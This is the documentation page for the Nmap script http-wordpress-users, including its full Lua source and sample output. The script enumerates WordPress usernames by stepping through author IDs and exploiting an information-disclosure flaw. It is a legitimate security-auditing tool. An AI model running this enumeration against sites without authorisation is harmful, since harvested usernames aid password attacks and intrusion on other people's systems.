<html><head><style>body {font-family: verdana;font-size: 0.7em;} tr {font-family: verdana;font-size: 0.7em;}</style></head><body>
<h3>File http-wordpress-users</h3>
<b>Script types:</b> portrule<br/>
<b>Categories:</b> auth,auth,auth<br/>
<b>Author:</b> Paulino Calderon <calderon@websec.mx><br/>
<b>License:</b> <a href="https://nmap.org/book/man-legal.html" target=_blank>https://nmap.org/book/man-legal.html</a><br/>
<b>Download:</b> <a href="https://svn.nmap.org/nmap/scripts/http-wordpress-users.nse">https://svn.nmap.org/nmap/scripts/http-wordpress-users.nse</a><br/>
<h3>Summary</h3>
<p>Enumerates usernames in Wordpress blog/CMS installations by exploiting an information disclosure vulnerability existing in versions 2.6, 3.1, 3.1.1, 3.1.3 and 3.2-beta2 and possibly others.</p>
<p>Original advisory:</p>
<ul>
<li><a href="http://www.talsoft.com.ar/site/research/security-advisories/wordpress-user-id-and-user-name-disclosure/" target=_blank>http://www.talsoft.com.ar/site/research/security-advisories/wordpress-user-id-and-user-name-disclosure/</a></li>
</ul>
<h3>Arguments</h3>
<table>
<tr><td>http-wordpress-users.out:</td><td>If set it saves the username list in this file.</td></tr>
<tr><td>http-wordpress-users.basepath:</td><td>Base path to Wordpress. Default: /</td></tr>
<tr><td>http-wordpress-users.limit:</td><td>Upper limit for ID search. Default: 25</td></tr>
<tr><td>slaxml.debug:</td><td>See the documentation for the <a href="nmap/libraries/slaxml.htm">slaxml</a> library</td></tr>
<tr><td>http.host:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>http.max-body-size:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>http.max-cache-size:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>http.pipeline:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>http.truncated-ok:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>http.useragent:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>smbdomain:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
<tr><td>smbhash:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
<tr><td>smbnoguest:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
<tr><td>smbpassword:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
<tr><td>smbtype:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
<tr><td>smbusername:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
</table>
<h3>Usage</h3>
<pre>nmap -p80 --script http-wordpress-users &lt;target&gt;
nmap -sV --script http-wordpress-users --script-args limit=50 &lt;target&gt;</pre>
<h3>Output</h3>
<pre>PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack
| http-wordpress-users:
| Username found: admin
| Username found: mauricio
| Username found: cesar
| Username found: lean
| Username found: alex
| Username found: ricardo
|_Search stopped at ID #25. Increase the upper limit if necessary with &#39;http-wordpress-users.limit&#39;</pre>
<h3>Requirements</h3>
<ul>
<li><a href="nmap/libraries/http.htm">http</a></li>
<li><a href="nmap/libraries/io.htm">io</a></li>
<li><a href="nmap/libraries/nmap.htm">nmap</a></li>
<li><a href="nmap/libraries/.htm"></a></li>
<li><a href="nmap/libraries/shortport.htm">shortport</a></li>
<li><a href="nmap/libraries/stdnse.htm">stdnse</a></li>
<li><a href="nmap/libraries/string.htm">string</a></li>
<li><a href="nmap/libraries/table.htm">table</a></li>
</ul>
<h3>Code</h3>
<pre>local http = require &quot;http&quot;
local io = require &quot;io&quot;
local nmap = require &quot;nmap&quot;
local shortport = require &quot;shortport&quot;
local stdnse = require &quot;stdnse&quot;
local string = require &quot;string&quot;
local table = require &quot;table&quot;

description = [[
Enumerates usernames in Wordpress blog/CMS installations by exploiting an
information disclosure vulnerability existing in versions 2.6, 3.1, 3.1.1,
3.1.3 and 3.2-beta2 and possibly others.

Original advisory:
* http://www.talsoft.com.ar/site/research/security-advisories/wordpress-user-id-and-user-name-disclosure/
]]

---
-- @usage
-- nmap -p80 --script http-wordpress-users &lt;target&gt;
-- nmap -sV --script http-wordpress-users --script-args limit=50 &lt;target&gt;
--
-- @output
-- PORT   STATE SERVICE REASON
-- 80/tcp open  http    syn-ack
-- | http-wordpress-users:
-- | Username found: admin
-- | Username found: mauricio
-- | Username found: cesar
-- | Username found: lean
-- | Username found: alex
-- | Username found: ricardo
-- |_Search stopped at ID #25. Increase the upper limit if necessary with &#39;http-wordpress-users.limit&#39;
--
-- @args http-wordpress-users.limit Upper limit for ID search. Default: 25
-- @args http-wordpress-users.basepath Base path to Wordpress. Default: /
-- @args http-wordpress-users.out If set it saves the username list in this file.
---

author = &quot;Paulino Calderon &lt;calderon@websec.mx&gt;&quot;
license = &quot;Same as Nmap--See https://nmap.org/book/man-legal.html&quot;
categories = {&quot;auth&quot;, &quot;intrusive&quot;, &quot;vuln&quot;}


portrule = shortport.http

---
-- Returns the username extracted from the url corresponding to the id passed
-- If user id doesn&#39;t exists returns false
-- @param host Host table
-- @param port Port table
-- @param path Base path to WP
-- @param id User id
-- @return false if not found otherwise it returns the username
---
local function get_wp_user(host, port, path, id)
  stdnse.debug2(&quot;Trying to get username with id %s&quot;, id)
  local req = http.get(host, port, path..&quot;?author=&quot;..id, { no_cache = true})
  if req.status then
    stdnse.debug1(&quot;User id #%s returned status %s&quot;, id, req.status)
    if req.status == 301 then
      local _, _, user = string.find(req.header.location, &#39;https?://.*/.*/(.*)/&#39;)
      return user
    elseif req.status == 200 then
      -- Users with no posts get a 200 response, but the name is in an RSS link.
      -- http://seclists.org/nmap-dev/2011/q3/812
      local _, _, user = string.find(req.body, &#39;https?://.-/author/([^/]+)/feed/&#39;)
      return user
    end
  end
  return false
end

---
--Returns true if WP installation exists.
--We assume an installation exists if wp-login.php is found
--@param host Host table
--@param port Port table
--@param path Path to WP
--@return True if WP was found
--
local function check_wp(host, port, path)
  stdnse.debug2(&quot;Checking %swp-login.php &quot;, path)
  local req = http.get(host, port, path..&quot;wp-login.php&quot;, {no_cache=true})
  if req.status and req.status == 200 then
    return true
  end
  return false
end

---
--Writes string to file
--Taken from: hostmap.nse
--@param filename Target filename
--@param contents String to save
--@return true when successful
local function write_file(filename, contents)
  local f, err = io.open(filename, &quot;w&quot;)
  if not f then
    return f, err
  end
  f:write(contents)
  f:close()
  return true
end


---
--MAIN
---
action = function(host, port)
  local basepath = stdnse.get_script_args(SCRIPT_NAME .. &quot;.basepath&quot;) or &quot;/&quot;
  local limit = stdnse.get_script_args(SCRIPT_NAME .. &quot;.limit&quot;) or 25
  local filewrite = stdnse.get_script_args(SCRIPT_NAME .. &quot;.out&quot;)
  local output = {&quot;&quot;}
  local users = {}
  --First, we check this is WP
  if not(check_wp(host, port, basepath)) then
    if nmap.verbosity() &gt;= 2 then
      return &quot;[Error] Wordpress installation was not found. We couldn&#39;t find wp-login.php&quot;
    else
      return
    end
  end

  --Incrementing ids to enum users
  for i=1, tonumber(limit) do
    local user = get_wp_user(host, port, basepath, i)
    if user then
      stdnse.debug1(&quot;Username found -&gt; %s&quot;, user)
      output[#output+1] = string.format(&quot;Username found: %s&quot;, user)
      users[#users+1] = user
    end
  end

  if filewrite and #users&gt;0 then
    local status, err = write_file(filewrite,  table.concat(users, &quot;\n&quot;))
    if status then
      output[#output+1] = string.format(&quot;Users saved to %s\n&quot;, filewrite)
    else
      output[#output+1] = string.format(&quot;Error saving %s: %s\n&quot;, filewrite, err)
    end
  end

  if #output &gt; 1 then
    output[#output+1] = string.format(&quot;Search stopped at ID #%s. Increase the upper limit if necessary with &#39;http-wordpress-users.limit&#39;&quot;, limit)
    return table.concat(output, &quot;\n&quot;)
  end
end</pre>
